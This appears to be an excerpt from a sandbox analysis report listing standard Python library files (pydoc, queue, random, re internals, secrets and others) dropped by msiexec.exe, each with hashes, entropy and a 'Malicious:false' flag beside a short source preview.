                                                                                                                                Preview:"""Parse a Python module and describe its classes and functions.....Parse enough of a Python file to recognize imports and class and..function definitions, and to find out the superclasses of a class.....The interface consists of a single function:.. readmodule_ex(module, path=None)..where module is the name of a Python module, and path is an optional..list of directories where the module is to be searched. If present,..path is prepended to the system search path sys.path. The return value..is a dictionary. The keys of the dictionary are the names of the..classes and functions defined in the module (including classes that are..defined via the from XXX import YYY construct). The values are..instances of classes Class and Function. One special key/value pair is..present for packages: the key '__path__' has a list as its value which..contains the package search path.....Classes and Functions have a common superclass: _Object. Every instance..has the following attributes:.. mod
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):111570
                                                                                                                                Entropy (8bit):4.571886305891207
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3072:ds30K1KUlS9ovMxDPADhaC7p09nArQz0loDjHm9OdB3P:ds31s9ogDc8jtckRDjOOb3P
                                                                                                                                MD5:0D12D0246A93132EDFC14516D16A7DE4
                                                                                                                                SHA1:F4C156ECAC40CE8AD926BE2F961AAFDD0274B557
                                                                                                                                SHA-256:E42BBB6C2641FEB9DC3772261823A65DA90F2927BD0C006827A4ADAD1B5AAA7E
                                                                                                                                SHA-512:4BF100388774ED85F9352A25F841F367D1DAF77BAC047E8678F2F649FAFB965C683E39789A0C2960725A0176D2480E7B6AF3581DA013266B3765D334D97AAB67
                                                                                                                                Malicious:false
                                                                                                                                Preview:#!/usr/bin/env python3.."""Generate Python documentation in HTML or text for interactive use.....At the Python interactive prompt, calling help(thing) on a Python object..documents the object, and calling help() starts up an interactive..help session.....Or, at the shell command line outside of Python:....Run "pydoc <name>" to show documentation on something. <name> may be..the name of a function, module, package, or a dotted reference to a..class or function within a module or module in a package. If the..argument contains a path segment delimiter (e.g. slash on Unix,..backslash on Windows) it is treated as the path to a Python source file.....Run "pydoc -k <keyword>" to search for a keyword in the synopsis lines..of all available modules.....Run "pydoc -n <hostname>" to start an HTTP server with the given..hostname (default: localhost) on the local machine.....Run "pydoc -p <port>" to start an HTTP server on the given port on the..local machine. Port number 0 can be used to get an
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1437
                                                                                                                                Entropy (8bit):4.724832454402538
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:lw+MFtPMbpPZTG592UcLcqF6WW6S2VnsrzQPt7hZPPGWjSfFn7o1:lw+Mf+p8591s96WW9wKqHMvtq
                                                                                                                                MD5:1183C4B960CD472060D325ADA9C06D8B
                                                                                                                                SHA1:80BCF962DB427F6498FF85D2EAF21E86FC2D8D9A
                                                                                                                                SHA-256:EA8F16DC31FAD44952DD9D6C5249E3D5EB51C67AA10D770C9342D372EB669B83
                                                                                                                                SHA-512:DA8504BE5773E3067A603C797B8D42638B33680281312DD1CC770C5BC09285ABFDF771517DF0C78C6EED765F9092BA15BB1647BFFE05F0E29127111F294FF537
                                                                                                                                Malicious:false
                                                                                                                                Preview:/*.. CSS file for pydoc..... Contents of this file are subject to change without notice.....*/....body {.. background-color: #f0f0f8;..}....table.heading tr {.. background-color: #7799ee;..}.....decor {.. color: #ffffff;..}.....title-decor {.. background-color: #ffc8d8;.. color: #000000;..}.....pkg-content-decor {.. background-color: #aa55cc;..}.....index-decor {.. background-color: #ee77aa;..}.....functions-decor {.. background-color: #eeaa77;..}.....data-decor {.. background-color: #55aa55;..}.....author-decor {.. background-color: #7799ee;..}.....credits-decor {.. background-color: #7799ee;..}.....error-decor {.. background-color: #bb0000;..}.....grey {.. color: #909090;..}.....white {.. color: #ffffff;..}.....repr {.. color: #c040c0;..}....table.heading tr td.title {.. vertical-align: bottom;..}....table.heading tr td.extra {.. vertical-align: bottom;.. text-align: right;..}.....heading-text {.. font-family: helvetica,
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):770708
                                                                                                                                Entropy (8bit):3.9085912256710156
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12288:Tz6liIkj2wK37/jobP7Twog4Iol/tZ+vGmkOrDIQzthjt:v6IIkjMzjuHwog4zc3t
                                                                                                                                MD5:5F8D21FCFD2A36E89B9CEC47B561DC7C
                                                                                                                                SHA1:637CF61855D711B2510FAD6090813A04E39B47F0
                                                                                                                                SHA-256:8CBE1CEA68CC4AB674AAA088B939701115087C1E9F58B1458C49C7F929EAF1A5
                                                                                                                                SHA-512:D184E32458CA5FF3C5ACB985268E7DD0E5C5A54DADDD1B2BDC6D28988EBE39FFAE5C0BED412CA4267E7B32170D6674B2D06C2A3CAD6D2EBBC9AB4CA36D041A5B
                                                                                                                                Malicious:false
                                                                                                                                Preview:# -*- coding: utf-8 -*-..# Autogenerated by Sphinx on Mon Oct 24 18:35:07 2022..topics = {'assert': 'The "assert" statement\n'.. '**********************\n'.. '\n'.. 'Assert statements are a convenient way to insert debugging '.. 'assertions\n'.. 'into a program:\n'.. '\n'.. ' assert_stmt ::= "assert" expression ["," expression]\n'.. '\n'.. 'The simple form, "assert expression", is equivalent to\n'.. '\n'.. ' if __debug__:\n'.. ' if not expression: raise AssertionError\n'.. '\n'.. 'The extended form, "assert expression1, expression2", is '.. 'equivalent to\n'.. '\n'.. ' if __debug__:\n'.. ' if not expression1: raise AssertionError(expression2)\n'.. '\n'.. 'These equivalences assume that "__debug__" and "AssertionError" '.. 'refer\n'.. 'to the built-in v
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):11822
                                                                                                                                Entropy (8bit):4.376403701654197
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:8yWZYD0IZsvHoH13DwaZbr1r+OO4HHHhBxwrA17IVhHohkwoa0vui8uftYi6zRSh:8ffIZTlZfphhVaazoBVYJeDQazkRQ
                                                                                                                                MD5:F777EB2684C7FFA466D1546E1972F8F1
                                                                                                                                SHA1:A2E1B0ADBE02008139E1DAFABFD14E3D33E5539A
                                                                                                                                SHA-256:3160B770DC5CBDF0A5F9297DD8EA7FB77ACD99B36AF8088C8015B119D2E5069F
                                                                                                                                SHA-512:7BDEC8B19CDA7A6682A93719AB551A3EA7DB157685EFD208F56B51049A177E7A0D69235AA954F755D881DC4BD8670D4CB120949EFEEE86148CFB5544A4D487EE
                                                                                                                                Malicious:false
                                                                                                                                Preview:'''A multi-producer, multi-consumer queue.'''....import threading..import types..from collections import deque..from heapq import heappush, heappop..from time import monotonic as time..try:.. from _queue import SimpleQueue..except ImportError:.. SimpleQueue = None....__all__ = ['Empty', 'Full', 'Queue', 'PriorityQueue', 'LifoQueue', 'SimpleQueue']......try:.. from _queue import Empty..except ImportError:.. class Empty(Exception):.. 'Exception raised by Queue.get(block=0)/get_nowait().'.. pass....class Full(Exception):.. 'Exception raised by Queue.put(block=0)/put_nowait().'.. pass......class Queue:.. '''Create a queue object with a given maximum size..... If maxsize is <= 0, the queue size is infinite... '''.... def __init__(self, maxsize=0):.. self.maxsize = maxsize.. self._init(maxsize).... # mutex must be held whenever the queue is mutating. All methods.. # that acquire mutex must release it before returning.
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):7510
                                                                                                                                Entropy (8bit):4.528644805401654
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:nP6LcGY5uUuWgCSqkc97dlDsYJuLz9/x/1d0:CjUuokcddl5oM
                                                                                                                                MD5:3B06A77D6A302CB952C0A488387F1624
                                                                                                                                SHA1:2C60F0345E160E7A793091EE6021E5A5760A3523
                                                                                                                                SHA-256:72312E4C1815E29A236D62871D313A9A2393A424A3E04AC3A1393A09C032D22D
                                                                                                                                SHA-512:4891E6FC7C6C29DFFDC632835B4272012B61A0A703852C64A80AACA35FB083747C650CA0D24C70283AE53DB975A7F58D0132D3869827C4EAC79F51653E8BACF1
                                                                                                                                Malicious:false
                                                                                                                                Preview:#! /usr/bin/env python3...."""Conversions to/from quoted-printable transport encoding as per RFC 1521."""....# (Dec 1991 version).....__all__ = ["encode", "decode", "encodestring", "decodestring"]....ESCAPE = b'='..MAXLINESIZE = 76..HEX = b'0123456789ABCDEF'..EMPTYSTRING = b''....try:.. from binascii import a2b_qp, b2a_qp..except ImportError:.. a2b_qp = None.. b2a_qp = None......def needsquoting(c, quotetabs, header):.. """Decide whether a particular byte ordinal needs to be quoted..... The 'quotetabs' flag indicates whether embedded tabs and spaces should be.. quoted. Note that line-ending tabs and spaces are always encoded, as per.. RFC 1521... """.. assert isinstance(c, bytes).. if c in b' \t':.. return quotetabs.. # if header, we have to escape _ because _ is used to escape space.. if c == b'_':.. return header.. return c == ESCAPE or not (b' ' <= c <= b'~')....def quote(c):.. """Quote a single character.""".. assert isins
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):32892
                                                                                                                                Entropy (8bit):4.503168879216932
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:C3reJ1jUi1Teujn3Akb2iPmfHbWW+DNXayEW:rHn3xb2Smz8L
                                                                                                                                MD5:8CEB74DD17D72C97E2BD289815F3BE00
                                                                                                                                SHA1:B509DB8182B10A6FACF6BCF407502EC348BAA4B7
                                                                                                                                SHA-256:AE833C2A04341150705A169F0A203EDB7A9A591897951D652ACE3E01D40CD33A
                                                                                                                                SHA-512:B45D588A8D2C1A772FE9DDE50D99B0856BC4D422C419106FE04FCD77BE752D3F6EEBA05CC263EE2DBB51C97D4AE7B632A91FF75CDDDD0D632607D2B067DA63F3
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Random variable generators..... bytes.. -----.. uniform bytes (values between 0 and 255).... integers.. --------.. uniform within range.... sequences.. ---------.. pick random element.. pick random sample.. pick weighted random sample.. generate random permutation.... distributions on the real line:.. ------------------------------.. uniform.. triangular.. normal (Gaussian).. lognormal.. negative exponential.. gamma.. beta.. pareto.. Weibull.... distributions on the circle (angles 0 to 2pi).. ---------------------------------------------.. circular uniform.. von Mises....General notes on the underlying Mersenne Twister core generator:....* The period is 2**19937-1...* It is one of the most extensively tested generators in existence...* The random() method is implemented in C, executes i
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):16263
                                                                                                                                Entropy (8bit):4.699876673876558
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:6bda8nr7PgL1TstSB3vFgSHoscB8kRD/y/0cy/9R1GRG3f40:6pa8nrrgpTstSB3NgSHoscBBRD6/y/9D
                                                                                                                                MD5:AD69E5AC359F2EED09294C2D4454EAEC
                                                                                                                                SHA1:101BD31C8AAF22AB35C333324128291D0B282AB1
                                                                                                                                SHA-256:E912249B8B1E2880FF212EF728E8BECBA893CE31BCB68AA2BFBCAB2C812E61BE
                                                                                                                                SHA-512:810305D37BD8CDA0033A9DFFBE0F54B7B5018DA0B3BA70F9A976228FA91DE4A00234D13A4BE2C9F5A22201C91C75BD17DD29F4B2246234D88060FE7ADC36BD92
                                                                                                                                Malicious:false
                                                                                                                                Preview:#..# Secret Labs' Regular Expression Engine..#..# re-compatible interface for the sre matching engine..#..# Copyright (c) 1998-2001 by Secret Labs AB. All rights reserved...#..# This version of the SRE library can be redistributed under CNRI's..# Python 1.6 license. For any other use, please contact Secret Labs..# AB (info@pythonware.com)...#..# Portions of this engine have been developed in cooperation with..# CNRI. Hewlett-Packard provided funding for 1.6 integration and..# other compatibility work...#....r"""Support for regular expressions (RE).....This module provides regular expression matching operations similar to..those found in Perl. It supports both 8-bit and Unicode strings; both..the pattern and the strings being processed can contain null bytes and..characters outside the US ASCII range.....Regular expressions can contain both special and ordinary characters...Most ordinary characters, like "A", "a", or "0", are the simplest..regular expressions; they simply match them
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):5552
                                                                                                                                Entropy (8bit):5.017919749404214
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:bFkA3VmiDYJY7AO7WsB7SCojpXF4/yxetoew:9mY6MByjpVS4et3w
                                                                                                                                MD5:8818057719AC1352408739DF89C9A0E0
                                                                                                                                SHA1:03E5515C56DBBD68ABED896E2B42BAA9923C1518
                                                                                                                                SHA-256:A1A8CE5D2051C96ABB0C854F4A9C513C219E821F7285D28330F84ECA71C341E2
                                                                                                                                SHA-512:0B958D0E675369BD7E33FAA449D21AE47CF61B1C37BAEFBC9F253DA721BE16A7F1DF9A64D1B3B2566AFB82081EA578E838F8ABE39B5E676441B8AC613AB07748
                                                                                                                                Malicious:false
                                                                                                                                Preview:# Auto-generated by Tools/scripts/generate_re_casefix.py.....# Maps the code of lowercased character to codes of different lowercased..# characters which have the same uppercase..._EXTRA_CASES = {.. # LATIN SMALL LETTER I: LATIN SMALL LETTER DOTLESS I.. 0x0069: (0x0131,), # 'i': '.'.. # LATIN SMALL LETTER S: LATIN SMALL LETTER LONG S.. 0x0073: (0x017f,), # 's': '.'.. # MICRO SIGN: GREEK SMALL LETTER MU.. 0x00b5: (0x03bc,), # '.': '.'.. # LATIN SMALL LETTER DOTLESS I: LATIN SMALL LETTER I.. 0x0131: (0x0069,), # '.': 'i'.. # LATIN SMALL LETTER LONG S: LATIN SMALL LETTER S.. 0x017f: (0x0073,), # '.': 's'.. # COMBINING GREEK YPOGEGRAMMENI: GREEK SMALL LETTER IOTA, GREEK PROSGEGRAMMENI.. 0x0345: (0x03b9, 0x1fbe), # '\u0345': '..'.. # GREEK SMALL LETTER IOTA WITH DIALYTIKA AND TONOS: GREEK SMALL LETTER IOTA WITH DIALYTIKA AND OXIA.. 0x0390: (0x1fd3,), # '.': '.'.. # GREEK SMALL LETTER UPSILON WITH DIALYTIKA AND TONOS: GREEK SMALL LETTE
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):26776
                                                                                                                                Entropy (8bit):4.367613091563817
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:FFBntP62WbNBC6b0ZxFu/5nyNHui0F6hRg:rBntP62Wz70Ze/5sHjla
                                                                                                                                MD5:5E3AD0B6D357A84899A32604699C0C49
                                                                                                                                SHA1:BBB5BA8E76AE8278293368EDE6152CA85F215F6B
                                                                                                                                SHA-256:712BB32F1D9D71E4F08486E5336C1303D65200D3249B1F6E0BEF770F68164BBD
                                                                                                                                SHA-512:7D96CFA8B608206AF615CFA04180BC7EF59F687FDF38E307AA96072911D475A01211FBA5091FB5D538221CA62F969B0BA1C53BEFDA0A0E19E900246EAD99D53B
                                                                                                                                Malicious:false
                                                                                                                                Preview:#..# Secret Labs' Regular Expression Engine..#..# convert template to internal format..#..# Copyright (c) 1997-2001 by Secret Labs AB. All rights reserved...#..# See the __init__.py file for information on usage and redistribution...#...."""Internal support module for sre"""....import _sre..from . import _parser..from ._constants import *..from ._casefix import _EXTRA_CASES....assert _sre.MAGIC == MAGIC, "SRE module mismatch"...._LITERAL_CODES = {LITERAL, NOT_LITERAL}.._SUCCESS_CODES = {SUCCESS, FAILURE}.._ASSERT_CODES = {ASSERT, ASSERT_NOT}.._UNIT_CODES = _LITERAL_CODES | {ANY, IN}...._REPEATING_CODES = {.. MIN_REPEAT: (REPEAT, MIN_UNTIL, MIN_REPEAT_ONE),.. MAX_REPEAT: (REPEAT, MAX_UNTIL, REPEAT_ONE),.. POSSESSIVE_REPEAT: (POSSESSIVE_REPEAT, SUCCESS, POSSESSIVE_REPEAT_ONE),..}....def _combine_flags(flags, add_flags, del_flags,.. TYPE_FLAGS=_parser.TYPE_FLAGS):.. if add_flags & TYPE_FLAGS:.. flags &= ~TYPE_FLAGS.. return (flags | add_flags) & ~d
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):6150
                                                                                                                                Entropy (8bit):5.170832539418731
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:N1+AbNCbWbHb4iZtYetYetYAPRtiafyld:NN8ipRtiY+
                                                                                                                                MD5:59937863320EB6D9823C206349E144A6
                                                                                                                                SHA1:AAC93867A51CF279FF5201BB2D9782D42988F1BC
                                                                                                                                SHA-256:581E6C50E7F71E73F909567A4F2A06BED6B0F95098FDB60A18B8E3D39AA5B5E8
                                                                                                                                SHA-512:95544491495CD61B80F5BA1ABC6BE7EE9CC19E537C6DEE32502B40CD3E3070F557794B9C366E1957223943B87D706C6568B319B121AE203F0D7BC7BDECC46019
                                                                                                                                Malicious:false
                                                                                                                                Preview:#..# Secret Labs' Regular Expression Engine..#..# various symbols used by the regular expression engine...# run this script to update the _sre include files!..#..# Copyright (c) 1998-2001 by Secret Labs AB. All rights reserved...#..# See the __init__.py file for information on usage and redistribution...#...."""Internal support module for sre"""....# update when constants are added or removed....MAGIC = 20220615....from _sre import MAXREPEAT, MAXGROUPS....# SRE standard exception (access as sre.error)..# should this really be here?....class error(Exception):.. """Exception raised for invalid regular expressions..... Attributes:.... msg: The unformatted error message.. pattern: The regular expression pattern.. pos: The index in the pattern where compilation failed (may be None).. lineno: The line corresponding to pos (may be None).. colno: The column corresponding to pos (may be None).. """.... __module__ = 're'.... def __init__(self, m
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):43213
                                                                                                                                Entropy (8bit):4.104896281546884
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:G1S5/1DRI/C5oJKn9BBLckfWoCf2DHXkCZzXdQ1LyhBX5FEnRxzAgHNM3nhI:G1S5/1D2/C5o4PBokfWoCf2DDrI
                                                                                                                                MD5:2153BC591ECEEFA14AC6DEF85475877C
                                                                                                                                SHA1:FA396BE048ABC3BEC353A3D72AEAD8B7787E0F8E
                                                                                                                                SHA-256:43C6A6D0873CFBBB1D76A74E72A5F7F6C8D0B09C4E9F427B27288D02D130384D
                                                                                                                                SHA-512:0A59C3EE7C217698E30D2B8FA525DAE7253E5E90A9999A5103D8A4B5DAB907C0F7D8792AF932A2500D9BA8C173780BE2E98C27585F499C32FAF03A7C7C0E9CE5
                                                                                                                                Malicious:false
                                                                                                                                Preview:#..# Secret Labs' Regular Expression Engine..#..# convert re-style regular expression to sre pattern..#..# Copyright (c) 1998-2001 by Secret Labs AB. All rights reserved...#..# See the __init__.py file for information on usage and redistribution...#...."""Internal support module for sre"""....# XXX: show string offset and offending character for all errors....from ._constants import *....SPECIAL_CHARS = ".\\[{()*+?^$|"..REPEAT_CHARS = "*+?{"....DIGITS = frozenset("0123456789")....OCTDIGITS = frozenset("01234567")..HEXDIGITS = frozenset("0123456789abcdefABCDEF")..ASCIILETTERS = frozenset("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ")....WHITESPACE = frozenset(" \t\n\r\v\f")...._REPEATCODES = frozenset({MIN_REPEAT, MAX_REPEAT, POSSESSIVE_REPEAT}).._UNITCODES = frozenset({ANY, RANGE, IN, LITERAL, NOT_LITERAL, CATEGORY})....ESCAPES = {.. r"\a": (LITERAL, ord("\a")),.. r"\b": (LITERAL, ord("\b")),.. r"\f": (LITERAL, ord("\f")),.. r"\n": (LITERAL, ord("\n")),.. r"\r"
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):5604
                                                                                                                                Entropy (8bit):4.391191193391889
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:Sr5xgG+4UXDromvCGYKvieQTEfoerKBLy22ga0Osgmto7Le4390Mvsxhui:I+Bromq0Y/FJCLe02Y/i
                                                                                                                                MD5:4391DA050FA6FA8DDF241DE229B5D3FC
                                                                                                                                SHA1:7D74C22A7517C82B230F751DBF35A25F63357514
                                                                                                                                SHA-256:E66E66EAE80B0300B332DF07949520BC59C8193F38B6FB848957C02985F3659B
                                                                                                                                SHA-512:DBE00984DA9263D5B8B293E9CE34D75C0F9BBF527761C890DE1F856699F5E7C59079DAA2FADB1034A3EDDCC5F4CA3C0620D7EA662EED4213D23F753B13381A08
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Redo the builtin repr() (representation) but with limits on most sizes."""....__all__ = ["Repr", "repr", "recursive_repr"]....import builtins..from itertools import islice..from _thread import get_ident....def recursive_repr(fillvalue='...'):.. 'Decorator to make a repr function return fillvalue for a recursive call'.... def decorating_function(user_function):.. repr_running = set().... def wrapper(self):.. key = id(self), get_ident().. if key in repr_running:.. return fillvalue.. repr_running.add(key).. try:.. result = user_function(self).. finally:.. repr_running.discard(key).. return result.... # Can't use functools.wraps() here because of bootstrap issues.. wrapper.__module__ = getattr(user_function, '__module__').. wrapper.__doc__ = getattr(user_function, '__doc__').. wrapper.__name__ = getattr(user_function, '__name__').
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):8046
                                                                                                                                Entropy (8bit):4.297147378828304
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:2rW3kbV7us2JNNJU9lfnhRv4Fys4blKREfGCcshW5YvNEEv+B:KGk1uJU9xhRoysxCED1EWB
                                                                                                                                MD5:309C25736F1E57A2C2433D958BCCD245
                                                                                                                                SHA1:D5D347631AF61111FCC6D0922964BC0E6CA5E48F
                                                                                                                                SHA-256:D0BABAB7D7859072FAD2E17EF430BC4910DB6F8D311D616B7855BF285C3FF7BB
                                                                                                                                SHA-512:6EADBAE9EACF617856EC4E2134D4A232F40163BA2BC54AED98B28AB1D4AB32A1403BCDA60850964B838EB9BB30C6520E5CA8DC956E39936CE49E43E2408F9810
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Word completion for GNU readline.....The completer completes keywords, built-ins and globals in a selectable..namespace (which defaults to __main__); when completing NAME.NAME..., it..evaluates (!) the expression up to the last dot and completes its attributes.....It's very cool to do "import sys" type "sys.", hit the completion key (twice),..and see the list of names defined by the sys module!....Tip: to use the tab key as the completion key, call.... readline.parse_and_bind("tab: complete")....Notes:....- Exceptions raised by the completer function are *ignored* (and generally cause.. the completion to fail). This is a feature -- since readline sets the tty.. device in raw (or cbreak) mode, printing a traceback wouldn't work well.. without some complicated hoopla to save, reset and restore the tty state.....- The evaluation of the NAME.NAME... form may cause arbitrary application.. defined code to be executed if an object with a __getattr__ hook is found... Since it is th
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):13482
                                                                                                                                Entropy (8bit):4.472246434192234
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:EUHgdO+nKGY9d9GxlJ4fr+2O4lAfhdgkdn+eO9:EUp5z3r+FRhdJO9
                                                                                                                                MD5:76A0FF2BC9349B99CA359A3D8D65485F
                                                                                                                                SHA1:EE8623E071B35BC72E73FA350C1C59E52903A51A
                                                                                                                                SHA-256:FCE3480932C47BF994124AF3BF5D619E3CEC6066B94241E85CB6E4175FC80976
                                                                                                                                SHA-512:48FB2C53565F900D2099F4101D32B5EA9A5D979ADC10E5E981E50E39F3C70225E902F155396750C67CD50BAFEE99D7651F0CE3C8FD34A80699E48B63D6F22CE9
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""runpy.py - locating and running Python code using the module namespace....Provides support for locating and running Python scripts using the Python..module namespace instead of the native filesystem.....This allows Python code to play nicely with non-filesystem based PEP 302..importers when locating support scripts as well as when importing modules..."""..# Written by Nick Coghlan <ncoghlan at gmail.com>..# to implement PEP 338 (Executing Modules as Scripts)......import sys..import importlib.machinery # importlib first so we can test #15386 via -m..import importlib.util..import io..import os....__all__ = [.. "run_module", "run_path",..]....# avoid 'import types' just for ModuleType..ModuleType = type(sys)....class _TempModule(object):.. """Temporarily replace a module in sys.modules with an empty namespace""".. def __init__(self, mod_name):.. self.mod_name = mod_name.. self.module = ModuleType(mod_name).. self._saved_module = [].... def __enter__(
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):6518
                                                                                                                                Entropy (8bit):4.428021460534201
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:7q7NKEDtr4SBrumjWpdBpBO6tibxmPKq5d6JIad/vkk:7q7N7jU26ut2Q/vkk
                                                                                                                                MD5:BBC46866A07502770BEC1716C4F1CEF0
                                                                                                                                SHA1:6E1FD86C4786295109C5F67194C980238A780C56
                                                                                                                                SHA-256:D337D7DDBEB4852D806AE3D29DD73C0F2E0A332C8CE4BEADDF7173C34D6849D8
                                                                                                                                SHA-512:FF21A29BDB6E29D0A2FEB1FC711B33055001D529F28034C2F37D5159BB709D93FE51305F43D60B36CDE7D181C8876EB7FD2BBC1D43E49F2FE3CD27BD9DB832F4
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""A generally useful event scheduler class.....Each instance of this class manages its own queue...No multi-threading is implied; you are supposed to hack that..yourself, or use a single instance per application.....Each instance is parametrized with two functions, one that is..supposed to return the current time, one that is supposed to..implement a delay. You can implement real-time scheduling by..substituting time and sleep from built-in module time, or you can..implement simulated time by writing your own functions. This can..also be used to integrate scheduling with STDWIN events; the delay..function is allowed to modify the queue. Time can be expressed as..integers or floating point numbers, as long as it is consistent.....Events are specified by tuples (time, priority, action, argument, kwargs)...As in UNIX, lower priority numbers mean higher priority; in this..way the queue can be maintained as a priority queue. Execution of the..event means calling the action function, pa
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2100
                                                                                                                                Entropy (8bit):5.058659590124803
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:OHeYkvHbJSNg/Yya6+N+Rv+f3xg8boRkGm26/UZ68fpqstap:mDk1Sq/YN6pRvGxgnRkGm26/UZ6+qAK
                                                                                                                                MD5:83404FE2AA31DB86DC936E65F31208AC
                                                                                                                                SHA1:9BC50D30ACD2D58651801DEC26C986C1B12EF9D1
                                                                                                                                SHA-256:C596EBE856F7462F38B33DCBC73791DAE7E7E6182FFB72B5541AADCD9771C560
                                                                                                                                SHA-512:D46BAF56A5A61ED76889D51E9298D5BE735835FA9B35C71C44D1B08762C7E179D81BB92750390FF3B0A1C72FD9AF19C7589818436D3B4881E4331627066E13DA
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Generate cryptographically strong pseudo-random numbers suitable for..managing secrets such as account authentication, tokens, and similar.....See PEP 506 for more information...https://peps.python.org/pep-0506/...."""....__all__ = ['choice', 'randbelow', 'randbits', 'SystemRandom',.. 'token_bytes', 'token_hex', 'token_urlsafe',.. 'compare_digest',.. ]......import base64..import binascii....from hmac import compare_digest..from random import SystemRandom...._sysrand = SystemRandom()....randbits = _sysrand.getrandbits..choice = _sysrand.choice....def randbelow(exclusive_upper_bound):.. """Return a random int in the range [0, n).""".. if exclusive_upper_bound <= 0:.. raise ValueError("Upper bound must be positive.").. return _sysrand._randbelow(exclusive_upper_bound)....DEFAULT_ENTROPY = 32 # number of bytes to return by default....def token_bytes(nbytes=None):.. """Return a random byte string containing *nbytes* bytes..... If *nbyt
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20103
                                                                                                                                Entropy (8bit):4.441989419375446
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:dTlKqIJUzW80Jm8QQo7YA3bVMR0Qid+dWMcK3CM1pBY45wBrhc6YN4o4F1Yzp8cW:dxK810DEBBhQErzhF8eTpJ
                                                                                                                                MD5:9ED6D9CC983549C644412AEA0885F374
                                                                                                                                SHA1:30FC3746101EECCC2385D8E9F5C6ACD95FB8EA1B
                                                                                                                                SHA-256:8927CE45615FD1794DBE250629E9F6837414EAC25334A203AEED81226E92D672
                                                                                                                                SHA-512:70F83FE11CA0A87B252E38D03F8BD5ACCB6E67C9E72EFD9C9DB2771B3BD19D18BA8453B704C0C2CC1E9A595D39E96B9ADB8C1659B36B9D893AF649F20538E25A
                                                                                                                                Malicious:false
